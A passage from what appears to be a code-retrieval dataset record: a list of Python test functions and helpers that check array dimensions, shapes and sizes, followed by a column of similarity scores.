X'\n\tassert x_sample_dim in X.dims, 'XCast requires a dataset_sample_dim to be a dimension on X'\n\tassert x_feature_dim in X.dims, 'XCast requires a dataset_feature_dim to be a dimension on X'", "def check_size(self,x,y):\n assert(x <= 10**3), 'Width larger than 1000' \n assert(y <= 10**3), 'Height larger than 1000' \n assert(x*y <= 3*(10**5)), 'Resolution larger than 300000'", "def test_upcast_dims(self):\n self.init()\n # Test sum\n assert sum_mat(self.i64_1) == np.sum(self.i64_1)\n assert sum_cube(self.f64_1) == np.sum(self.f64_1)\n assert sum_cube(self.fi64_2) == np.sum(self.fi64_2)\n # Test transpose\n assert self.i64_1.shape == (3,)\n assert transpose_mat(self.i64_1).shape == (1,3)\n assert np.all(transpose_mat(self.i64_1) == self.i64_1.T)\n # Test that downcasting is not possible\n with pytest.raises(TypeError):\n transpose_mat(self.i64_3)\n with pytest.raises(TypeError):\n sum_vec(self.ff64_2)", "def __DimSiz_restriction_correct_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_slice_other_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)+shape[1:]", "def test_correct_image_size(location):\n chunkloc = resave_to_chunks(root=location[\"dir\"],\n n_imgs=10,\n output_stem=location[\"stem\"])\n\n loaded = np.load(chunkloc)\n assert len(loaded.files) > 0\n\n first = loaded[loaded.files[0]]\n assert first.shape != ()\n assert first.shape == (520, 696)", "def test_shape(self, varname, varshape, ndim): \n if len(varshape) != ndim:\n raise ShapeError('Shape=%s. 
Expected %i-D array for %s' %\n (repr(varshape), ndim, varname))", "def testFunction(self, input_shape, stride, kernel_shape, padding,\n output_shape):\n self.assertEqual(conv._default_transpose_size(input_shape, stride,\n kernel_shape=kernel_shape,\n padding=padding),\n tuple(output_shape))", "def test_check_X_too_many_dims():\n with pytest.raises(ValueError):\n check_X(np.ones((5,4,3)))", "def test_basic_cardinality(self):\n dim = Real(\"yolo\", \"reciprocal\", 0.043, 2.3, precision=2)\n order_0012 = np.arange(43, 99 + 1)\n order_010 = np.arange(10, 99 + 1)\n order_23 = np.arange(10, 23 + 1)\n assert dim.cardinality == sum(map(len, [order_0012, order_010, order_23]))", "def size(self):\n\t\treturn self.dims", "def test_validate_ndim():\n with pytest.raises(ValueError):\n validate_ndim(0)\n with pytest.raises(ValueError):\n validate_ndim(-1)\n with pytest.raises(ValueError):\n validate_ndim(0.5)\n\n assert validate_ndim(1) == 1\n assert validate_ndim(2) == 2", "def test_size_returns_length(dq_3):\n assert dq_3.size() == 3", "def check_dim(gr, DIM):\n l = len(gr)\n if(l != DIM):\n return False\n\n for i in range(0, DIM):\n if(len(gr[i]) != l):\n return False \n return True", "def __DimSiz_restriction_correct_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (2) [pedantic] (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(10, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def __DimSiz_restriction_correct_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to a number (correct)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def test_table_sizes(self):\n labels_tables = self.labels.find_one({ 'dataset': 'SF1' })['tables']\n\n for label_data in labels_tables.values():\n self.assertEqual(label_data['size'], len(label_data['labels']))", "def test_infer_target_shape(self):\n t = Quantize()\n assert t.infer_target_shape((5,)) == (5,)", "def required_input_dim(space: gym.Space, **kwargs) -> int:", "def get_dimension_length(self):\n pass", "def dims(self):\n return self.v.dims() # TODO: check (empty? etc)\n #return self.t.shape # TODO: check (empty? etc)\n # TODO: convert to tuple? 
here / in varset?", "def test_embedding_matrix_shape(self):\n num_embeddings = 10\n features = 5\n embed = layers.Embed(num_embeddings=num_embeddings, features=features)\n inputs = np.expand_dims(np.arange(features, dtype=np.int64), 1)\n variables = embed.init(jax.random.PRNGKey(0), inputs)\n embedding_matrix = variables['params']['embedding']\n self.assertEqual((num_embeddings, features), embedding_matrix.shape)", "def testSimOuptputDimensions(self):\n self.tree.set_database(self.coal)\n sim_params = self.tree.get_simulation_parameters()\n self.assertEqual(sim_params[\"fine_map_x\"], 24)\n self.assertEqual(sim_params[\"fine_map_y\"], 24)\n self.assertEqual(sim_params[\"fine_map_x_offset\"], 0)\n self.assertEqual(sim_params[\"fine_map_y_offset\"], 0)\n self.assertEqual(sim_params[\"sim_complete\"], 1)", "def desiredDimensions(self):\n return None", "def test_gameboard_size(self):\n self.assertEqual(self.gameBoard.get_size(), (100, 100))\n self.assertEqual(self.gameBoard.get_columns(), 100)\n self.assertEqual(self.gameBoard.get_rows(), 100)", "def _check_shape(placeholder_shape, data_shape):\n\n return True", "def _test_obsmdsize(t):\n md = t.metadata(axis='observation')\n return t.shape[0] != len(md) if md is not None else False", "def test_resize3d():\n\n # Check resize3d for images with different size and without channel nor batch - Pass\n input_shape = (1, 3, 5)\n output_shape = (2, 4, 6)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and without channel - Pass\n input_shape = (1, 1, 3, 5)\n output_shape = (1, 2, 4, 6)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and with one channel - Pass\n input_shape = (1, 1, 3, 5, 1)\n output_shape = (1, 2, 4, 6, 1)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with different size and with multiple channels - Pass\n input_shape = (1, 1, 3, 5, 3)\n output_shape = (1, 2, 4, 6, 3)\n size = (2, 4, 6)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and without channel nor batch - Pass\n input_shape = (1, 3, 5)\n output_shape = (1, 3, 5)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and without channel - Pass\n input_shape = (1, 1, 3, 5)\n output_shape = (1, 1, 3, 5)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and with one channel - Pass\n input_shape = (1, 1, 3, 5, 1)\n output_shape = (1, 1, 3, 5, 1)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for images with the same size and with multiple channels - Pass\n input_shape = (1, 1, 3, 5, 3)\n output_shape = (1, 1, 3, 5, 3)\n size = (1, 3, 5)\n got = layer_util.resize3d(image=tf.ones(input_shape), size=size)\n assert got.shape == output_shape\n\n # Check resize3d for proper image dimensions - Fail\n input_shape = (1, 1)\n size = (1, 1, 1)\n with pytest.raises(ValueError) as execinfo:\n 
layer_util.resize3d(image=tf.ones(input_shape), size=size)\n msg = \" \".join(execinfo.value.args[0].split())\n assert \"resize3d takes input image of dimension 3 or 4 or 5\" in msg\n\n # Check resize3d for proper size - Fail\n input_shape = (1, 1, 1)\n size = (1, 1)\n with pytest.raises(ValueError) as execinfo:\n layer_util.resize3d(image=tf.ones(input_shape), size=size)\n msg = \" \".join(execinfo.value.args[0].split())\n assert \"resize3d takes size of type tuple/list and of length 3\" in msg", "def has_dims(xobj, dims, kind):\n if isinstance(dims, str):\n dims = [dims]\n\n if not all(dim in xobj.dims for dim in dims):\n raise DimensionError(\n f'Your {kind} object must contain the '\n f'following dimensions at the minimum: {dims}'\n )\n return True", "def dims(x):\n return len(x.shape)", "def _test_sampmdsize(t):\n md = t.metadata(axis='sample')\n return t.shape[1] != len(md) if md is not None else False", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def ndims(x):\n return len(x.get_shape())", "def test_test_image_dims_content(self):\n iterator = self._dataset.get_test()\n sample = next(iterator)\n image, label = sample['image'], sample['label']\n\n with self.subTest(name='DataShape'):\n self.assertTupleEqual(image.shape, (self._batch_size_test, 32, 32, 3))\n\n with self.subTest(name='DataType'):\n self.assertTrue(np.issubdtype(image.dtype, float))\n\n with self.subTest(name='DataValues'):\n # Normalized by stddev., expect nothing to fall outside 3 stddev.\n self.assertTrue((image >= -3.).all() and (image <= 3.).all())\n\n with self.subTest(name='LabelShape'):\n self.assertLen(label, self._batch_size_test)\n\n with self.subTest(name='LabelType'):\n self.assertTrue(np.issubdtype(label.dtype, int))\n\n with self.subTest(name='LabelValues'):\n self.assertTrue((label >= 0).all() and\n (label <= self._dataset.num_classes).all())", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 13, 'pages', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(14, 3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def __DimSiz_restriction_incorrect_ndarray_number_pedantic2(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (2) [pedantic] (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 2, 'rows', pedantic=1)\n\n RxCSObject.parameter1 = np.random.randn(3, 3)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def nd_shape_checking(x, y, mvaxis, traxis):\n assert x.ndim == y.ndim\n dims = np.delete(np.arange(x.ndim), -2)\n assert all([x.shape[k] == y.shape[k] for k in dims])", "def __DimSiz_restriction_correct_ndarray_ndarray_pedantic3(self):\n\n strTestName = 'The size of a dimension of a Numpy array higher or equal to the size of a dimension of another Numpy array [pedantic] (3) 
(correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('aParameter1', 'Numpy array parameter')\n RxCSObject.paramType('aParameter1', np.ndarray)\n\n # Now, let us define a Numpy Array\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimHE('parameter1', 'aParameter1', 'rows', 'columns', pedantic=1, add=1)\n\n RxCSObject.parameter1 = np.random.randn(4, 3, 4)\n RxCSObject.aParameter1 = np.random.randn(3, 2)\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def getNumDimensions(self):\n return len(self.di.keys())", "def n_dims(self):\n return len(self.dimensions)", "def test_ndim(self):\r\n # 'ndim' is an optional integer parameter, specifying the length\r\n # of the 'shape', passed as a keyword argument.\r\n\r\n # ndim not specified, OK\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.uniform((2,2)))\r\n\r\n # ndim specified, consistent with shape, OK\r\n random2 = RandomStreams(utt.fetch_seed())\r\n fn2 = function([], random2.uniform((2,2), ndim=2))\r\n\r\n val1 = fn()\r\n val2 = fn2()\r\n assert numpy.all(val1 == val2)\r\n\r\n # ndim specified, inconsistent with shape, should raise ValueError\r\n random3 = RandomStreams(utt.fetch_seed())\r\n self.assertRaises(ValueError, random3.uniform, (2,2), ndim=1)", "def _SetDimensions(self):\n self._size = 0\n for variable_ndarray in self._layer.get_weights():\n size = variable_ndarray.size\n self._dimensions.append((variable_ndarray.shape, size))\n self._size += size", "def test_contains_shape(self):\n dim = Dimension(None, \"uniform\", -3, 4, shape=(4, 4))\n\n with pytest.raises(NotImplementedError):\n assert dists.uniform.rvs(-3, 4, size=(4, 4)) in dim", "def testSize (self):\r\n \r\n perpixel = bytes_per_pixel [self.bih_vals [bih_BitCount]]\r\n width = self.bih_vals [bih_Width]\r\n height = self.bih_vals [bih_Height]\r\n expected = self.bih_vals [bih_SizeImage]\r\n\r\n # Rows always have multiples of 4 bytes\r\n \r\n padding = 3 - ((perpixel * width + 3) % 4)\r\n size = (width * perpixel + padding) * height\r\n\r\n if not size == expected:\r\n print \"Calculated size = %d (<> %d)\" % (size, expected)\r\n print \"***** File size error *****\"", "def _test_sampsize(t):\n return t.shape[1] != len(t.ids(axis='sample'))", "def test_check_width(self):\n r1 = Rectangle(10, 2)\n self.assertEqual(r1.width, 10)\n\n r2 = Rectangle(2, 10)\n self.assertEqual(r2.width, 2)\n\n r3 = Rectangle(5, 2, 0, 0, 12)\n self.assertEqual(r3.width, 5)", "def test_shapes(self, n_layers, n_wires, tol):\n\n shapes = qml.CVNeuralNetLayers.shape(n_layers, n_wires)\n expected = expected_shapes(n_layers, n_wires)\n\n assert np.allclose(shapes, expected, atol=tol, rtol=0)", "def __DimSiz_restriction_incorrect_ndarray_number(self):\n\n strTestName = 'The size of a dimension of a Numpy array lower or equal to a number (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Numpy array parameter')\n RxCSObject.paramType('parameter1', np.ndarray)\n RxCSObject.paramDimLE('parameter1', 3, 1) # Size of dimension 1 must be higher than 3'\n\n RxCSObject.parameter1 = np.random.randn(3, 4)\n\n self.__parametersCheck_error(RxCSObject, DimSizError, strTestName)", "def dim(self) -> int:\n pass", "def __len__(self) -> int:\n\n return self.layout.gaDims", "def test_shape(self):\n M = simulation.StateMonitor(self.G, ['a', 'v'])\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n 
sim.run(self.t_max)\n\n nsteps = int_r(self.t_max/self.dt)\n self.assertEqual(M.v.shape, (self.N, nsteps))\n self.assertEqual(M.a.shape, (2, nsteps))", "def test_size():\r\n for sparse_type in ('csc_matrix', 'csr_matrix'):\r\n x = getattr(theano.sparse, sparse_type)()\r\n y = getattr(scipy.sparse, sparse_type)((5, 7)).astype(config.floatX)\r\n get_size = theano.function([x], x.size)\r\n\r\n def check():\r\n assert y.size == get_size(y)\r\n # We verify that the size is correctly updated as we store more data\r\n # into the sparse matrix (including zeros).\r\n check()\r\n y[0, 0] = 1\r\n check()\r\n y[0, 1] = 0\r\n check()", "def _check_dimensions(self, a, b):\n units_a = self._get_units(a)\n units_b = self._get_units(b)\n dim_a = units_a.dimensions\n dim_b = units_b.dimensions\n if dim_a != dim_b:\n raise UnitConversionError(units_a, dim_a, units_b, dim_b)", "def test_separate_ims():\n\n df1, df2 = setup()\n\n # Test 1\n im = separate_ims(df1)\n size = df1['imdims'][0]\n assert im.size == (size[0]*2, size[1])\n\n # Test 2\n im = separate_ims(df2)\n size = df2['imdims'][0]\n assert im.size == (size[0], size[1])", "def _check_ensembles_are_same_size(p, q):\n if p.npdf != q.npdf:\n raise ValueError(\"Input ensembles should have the same number of distributions\")", "def _assertCollectionSize(self, expected_size, collection):\n actual_size = len(tf.get_collection(collection))\n if expected_size != actual_size:\n self.fail(\"Found %d items in collection %s (expected %d).\" %\n (actual_size, collection, expected_size))", "def _check_shape(input_shape):\n msg = ('Input to SpatialExpansion must be 4D with dimensions: '\n '(n_observations, n_spatial_0, n_spatial_1, n_features), '\n 'but received shape: {}'.format(input_shape))\n assert len(input_shape) == 4, msg", "def test_image_folder_datasource_size_parameter(\n ray_start_regular_shared, enable_automatic_tensor_extension_cast\n):\n root = \"example://image-folders/different-sizes\"\n ds = ray.data.read_datasource(ImageFolderDatasource(), root=root, size=(32, 32))\n\n tensors = ds.to_pandas()[\"image\"]\n assert all(tensor.shape == (32, 32, 3) for tensor in tensors)" ]
[ "0.76725674", "0.75539386", "0.74125654", "0.7359512", "0.73051524", "0.72323257", "0.7225344", "0.7185799", "0.71210706", "0.6941943", "0.68519884", "0.6851906", "0.68469083", "0.68195313", "0.6812142", "0.67658305", "0.6746414", "0.6741667", "0.6688384", "0.66588515", "0.66540855", "0.6652592", "0.6647712", "0.66447943", "0.6630445", "0.6628934", "0.6613684", "0.6611912", "0.6608618", "0.65892714", "0.6588475", "0.6569945", "0.6566038", "0.6564777", "0.6560782", "0.6548039", "0.6544226", "0.65412474", "0.65286076", "0.6528576", "0.6524179", "0.6516652", "0.65136117", "0.6507439", "0.65043724", "0.6502506", "0.6496374", "0.6496141", "0.649542", "0.64860827", "0.648127", "0.6479723", "0.6452053", "0.6439915", "0.6438422", "0.6436254", "0.6413669", "0.63907695", "0.6381488", "0.637147", "0.6368019", "0.6349676", "0.6342561", "0.6339706", "0.6330898", "0.6329612", "0.63273704", "0.6321226", "0.6318467", "0.6312691", "0.63125414", "0.6308242", "0.6296662", "0.6289862", "0.62892014", "0.6288505", "0.62833905", "0.62826365", "0.6280874", "0.62799966", "0.62764865", "0.6275759", "0.6275157", "0.62634623", "0.62608486", "0.62598836", "0.6258721", "0.6257438", "0.62539715", "0.62536025", "0.6251206", "0.62500966", "0.62441885", "0.62386644", "0.6213573", "0.62124985", "0.62063485", "0.6205541", "0.62053895", "0.62052035" ]
0.76781756
0
Test explicit overrides for the leading time dimension
def test_dimension_size_override(self, nt=100):
    i, j, k = dimify('i j k')
    a = TimeData(name='a', dimensions=(i, j, k))
    one = symbol(name='one', dimensions=(i, j, k), value=1.)
    op = Operator(Eq(a.forward, a + one))

    # Test dimension override via the buffered dimenions
    a.data[0] = 0.
    op(a=a, t=6)
    assert(np.allclose(a.data[1], 5.))

    # Test dimension override via the parent dimenions
    a.data[0] = 0.
    op(a=a, time=5)
    assert(np.allclose(a.data[0], 4.))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_general_subset_invalid_time():\n pass", "def test_fix_metadata_correct_time(self):\n fixed_cube = self.fix.fix_metadata([self.cube])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [0, 1])\n assert time_coord.bounds is None", "def test_general_subset_time():\n pass", "def test_fix_metadata_wrong_time_no_bounds(self):\n self.cube_with_wrong_time.coord('time').bounds = None\n fixed_cube = self.fix.fix_metadata([self.cube_with_wrong_time])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [-711845.0, -711814.0])\n assert time_coord.bounds is None", "def _IsTimeReplot( self ):\n return True", "def test_fix_metadata_wrong_time(self):\n fixed_cube = self.fix.fix_metadata([self.cube_with_wrong_time])[0]\n time_coord = fixed_cube.coord('time')\n np.testing.assert_allclose(time_coord.points, [-711841.5, -711810.5])\n np.testing.assert_allclose(\n time_coord.bounds,\n [[-711857.0, -711826.0], [-711826.0, -711796.5]])", "def __isub__(self, *args, **kwargs):\n return _uhd_swig.time_spec_t___isub__(self, *args, **kwargs)", "def test_13_not_indexed_by_time(self):\n parsed = timeseries.parse_timeseries(data=self.meas_13,\n index_by_time=False)\n\n # In this case, we should have 'time' as a column rather than\n # the index.\n self.assertIn('time', parsed.columns)\n\n # Ensure we just have a simple range index.\n self.assertEqual(parsed.index[0], 0)\n self.assertEqual(parsed.index[-1], parsed.shape[0] - 1)", "def test_timestamp_spacing_one_missing(times):\n assert_series_equal(\n time.spacing(times[[0, 2, 3]], times.freq),\n pd.Series([True, False, True], index=times[[0, 2, 3]])\n )", "def _uses_datetimeblock(dtype: Union[np.dtype, ExtensionDtype]) -> bool:\n vtype = dtype.type\n return issubclass(vtype, np.datetime64)", "def is_temporal(axis):\n return (axis.lower() in temporal_axes)", "def test_time_field():", "def test_time_type_state_is_noon(day):\n\n assert day_time_info(day.hours_0).is_noon is False\n assert day_time_info(day.hours_1).is_noon is False\n assert day_time_info(day.hours_2).is_noon is False\n assert day_time_info(day.hours_3).is_noon is False\n assert day_time_info(day.hours_4).is_noon is False\n assert day_time_info(day.hours_5).is_noon is False\n assert day_time_info(day.hours_6).is_noon is False\n assert day_time_info(day.hours_7).is_noon is False\n assert day_time_info(day.hours_8).is_noon is False\n assert day_time_info(day.hours_9).is_noon is False\n assert day_time_info(day.hours_10).is_noon is False\n assert day_time_info(day.hours_11).is_noon is False\n assert day_time_info(day.hours_12).is_noon is True\n assert day_time_info(day.hours_13).is_noon is False\n assert day_time_info(day.hours_14).is_noon is False\n assert day_time_info(day.hours_15).is_noon is False\n assert day_time_info(day.hours_16).is_noon is False\n assert day_time_info(day.hours_17).is_noon is False\n assert day_time_info(day.hours_18).is_noon is False\n assert day_time_info(day.hours_19).is_noon is False\n assert day_time_info(day.hours_20).is_noon is False\n assert day_time_info(day.hours_21).is_noon is False\n assert day_time_info(day.hours_22).is_noon is False\n assert day_time_info(day.hours_23).is_noon is False", "def test_003_not_enough_datetimes() -> None:\n df = generate_test_data()\n df = df.head(2)\n skim(df)", "def test_as_specified(self):\n self.assertEqual(\n time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S'),\n '2020-07-31 23:59:30')\n self.assertEqual(\n 
time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S',\n with_msec=True),\n '2020-07-31 23:59:30.357')\n self.assertEqual(\n time_display._as_specified(\n datetime(2020, 7, 31, 23, 59, 30, 357921),\n '%Y-%m-%d %H:%M:%S',\n with_usec=True),\n '2020-07-31 23:59:30.357921')", "def inner_test(param: datetime.timedelta):\n pass", "def test_dt_preservation(self):\n dt = 0.6767335\n test_rec = rt.Recording([[[0, 1, 2]]], dt=dt)\n self.assertEqual(\n test_rec.dt,\n dt,\n 'Assigned `dt` not equal to attribute `dt`; test code probably '\n 'broken.',\n )\n self.assertEqual(\n test_rec[..., 1:].dt,\n dt,\n '`Recording.dt` attribute altered by slicing.',\n )\n self.assertEqual(\n test_rec[..., 1].dt,\n dt,\n '`dt` attribute altered by retrieving single element of `Recording`.',\n )", "def _validate_time_params(time_params):\n allowed_params = (\"Ntimes\", \"start_time\", \"integration_time\", \"time_array\")\n if time_params.get(\"time_array\", None) is not None:\n return True\n elif all(time_params.get(param, None) is not None for param in allowed_params[:-1]):\n # Technically, start_time doesn't need to be specified, since it has a\n # default setting in io.py, but that might not be set in stone.\n return True\n else:\n return False", "def test_TimeArray_convert_unit():", "def test_time(self):\r\n pass", "def has_ontime_pane(self):\n pass", "def _validate_dimensionality(self):\r\n\r\n if self.time.ndim != 1:\r\n raise ValueError(\"time array must be one-dimensional\")\r\n npoints = self.data.shape[-1]\r\n if npoints != len(self.time):\r\n raise ValueError(\"mismatch of time and data dimensions\")", "def test_training_time(self):\n self.assertIsInstance(self.one_off_training.time, datetime.time)\n self.assertEqual(self.one_off_training.time, datetime.time(9, 0))", "def check_dimension(dim, meta, trace=False):\n if dim == \"..\":\n meta[\"dimension\"] = declast.AssumedRank()\n meta[\"assumed-rank\"] = True\n else:\n meta[\"dimension\"] = declast.ExprParser(dim, trace=trace).dimension_shape()", "def test_ensure_ts_ts(self):\n self.assertEqual(ensure_ts(self.jobset2), 'imaginary')", "def test_time_type_state_types(day):\n\n assert day_time_info(day.hours_0).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_1).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_2).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_3).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_4).types == {TimeType.NIGHT}\n assert day_time_info(day.hours_5).types == {TimeType.MORNING}\n assert day_time_info(day.hours_6).types == {TimeType.MORNING}\n assert day_time_info(day.hours_7).types == {TimeType.MORNING}\n assert day_time_info(day.hours_8).types == {TimeType.MORNING}\n assert day_time_info(day.hours_9).types == {TimeType.MORNING}\n assert day_time_info(day.hours_10).types == {TimeType.MIDMORNING}\n assert day_time_info(day.hours_11).types == {TimeType.MIDMORNING}\n assert day_time_info(day.hours_12).types == {TimeType.NOON}\n assert day_time_info(day.hours_13).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_14).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_15).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_16).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_17).types == {TimeType.AFTERNOON}\n assert day_time_info(day.hours_18).types == {TimeType.EVENING}\n assert day_time_info(day.hours_19).types == {TimeType.EVENING}\n assert day_time_info(day.hours_20).types == {TimeType.EVENING}\n assert 
day_time_info(day.hours_21).types == {TimeType.EVENING}\n assert day_time_info(day.hours_22).types == {TimeType.EVENING}\n assert day_time_info(day.hours_23).types == {TimeType.NIGHT}", "def test_time_dicts():\n dmd = DMD()\n dmd.fit(X=sample_data_1, Y=sample_data_2)\n expected_dict = {\"dt\": 1, \"t0\": 0, \"tend\": 13}\n np.testing.assert_equal(dmd.original_time, expected_dict)\n np.testing.assert_equal(dmd.dmd_time, expected_dict)", "def test_tzaware_datetime_support(self):\r\n pk = uuid4()\r\n midpoint_utc = datetime.utcnow().replace(tzinfo=TzOffset(0))\r\n midpoint_helsinki = midpoint_utc.astimezone(TzOffset(3))\r\n\r\n # Assert pre-condition that we have the same logical point in time\r\n assert midpoint_utc.utctimetuple() == midpoint_helsinki.utctimetuple()\r\n assert midpoint_utc.timetuple() != midpoint_helsinki.timetuple()\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc - timedelta(minutes=1)),\r\n data='1')\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc),\r\n data='2')\r\n\r\n TimeUUIDQueryModel.create(\r\n partition=pk,\r\n time=columns.TimeUUID.from_datetime(midpoint_utc + timedelta(minutes=1)),\r\n data='3')\r\n\r\n assert ['1', '2'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time <= functions.MaxTimeUUID(midpoint_utc))]\r\n\r\n assert ['1', '2'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time <= functions.MaxTimeUUID(midpoint_helsinki))]\r\n\r\n assert ['2', '3'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time >= functions.MinTimeUUID(midpoint_utc))]\r\n\r\n assert ['2', '3'] == [o.data for o in TimeUUIDQueryModel.filter(\r\n TimeUUIDQueryModel.partition == pk,\r\n TimeUUIDQueryModel.time >= functions.MinTimeUUID(midpoint_helsinki))]", "def test_timestamp_spacing_too_frequent(times):\n assert_series_equal(\n time.spacing(times, '30min'),\n pd.Series([True] + [False] * (len(times) - 1), index=times)\n )", "def test_no_timesteps_property(self):\n expected_values = {\n 'no_timesteps': 1000,\n 'no_sweeps': 10,\n 'no_channels': 4,\n }\n test_rec = rt.Recording(\n np.zeros(\n [\n expected_values['no_channels'],\n expected_values['no_timesteps'],\n expected_values['no_sweeps'],\n ]\n ),\n dt=0.1,\n )\n self.assertEqual(\n test_rec.no_timesteps,\n expected_values['no_timesteps'],\n 'Expected {} for `no_timesteps` property; got {} instead.'.format(\n expected_values['no_timesteps'], test_rec.no_timesteps\n ),\n )", "def test_missing_report_datetime(self):\n self.assertEqual(datetime.datetime.min, self.__uft.datetime('raise'))", "def test_interval(self):\n dim = Fidelity(\"epoch\", 1, 10)\n dim.interval() == (1, 10)", "def test_ensure_ts_not_ts(self):\n self.assertEqual(ensure_ts(self.jobset1), 'opt')", "def common_axis( axis1, axis2 ):\n if hasattr( axis1, 'units' ):\n units1 = axis1.units.lower().replace(' ','_')\n if axis1.isTime():\n axis1.toRelativeTime( units1 ) #probably will change input argument\n else:\n units1 = None\n if hasattr( axis2, 'units' ):\n units2 = axis2.units.lower().replace(' ','_')\n else:\n units2 = None\n if units1!=None and units2!=None and units1 != units2:\n if axis1.isTime() and axis2.isTime():\n axis2.toRelativeTime( units1, axis1.getCalendar() ) #probably will change input argument\n else:\n print \"ERROR. 
